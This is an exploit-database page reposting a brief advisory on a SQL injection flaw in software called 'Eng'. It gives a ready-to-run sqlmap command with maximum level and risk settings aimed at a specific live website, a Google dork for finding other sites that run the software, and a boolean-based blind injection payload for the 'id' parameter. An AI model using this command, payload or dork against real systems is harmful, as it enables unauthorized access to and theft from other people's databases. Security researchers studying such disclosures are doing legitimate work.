Advertisement






ENG - SQL Injection vulnerability

CVE Category Price Severity
CWE-89 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2020-10-23
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100152

Below is a copy:

ENG - SQL Injection vulnerability
****************************
#Exploit Title: ENG - SQL Injection vulnerability
#Date: 2020-10-23
#Exploit Author: Mahdi Karimi
#Vendor Homepage: https://eng.nihongodecarenavi.jp
#Google Dork: "Powered by Eng"
#Tested On: windows 10


sqlmap:
sqlmap -u "https://eng.nihongodecarenavi.jp/category/category-list.php?id=86" --level=5 --risk=3 --dbs --random-agent
Testing Method;
- boolean-based blind

Parameter: id (GET)
    Type: boolean-based blind
    Title: HAVING boolean-based blind - WHERE, GROUP BY clause
    Payload: id=86 HAVING 2301=2301

**************************************************
#Discovered by: Mahdi Karimi
#Email : [email protected]
**************************************************

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum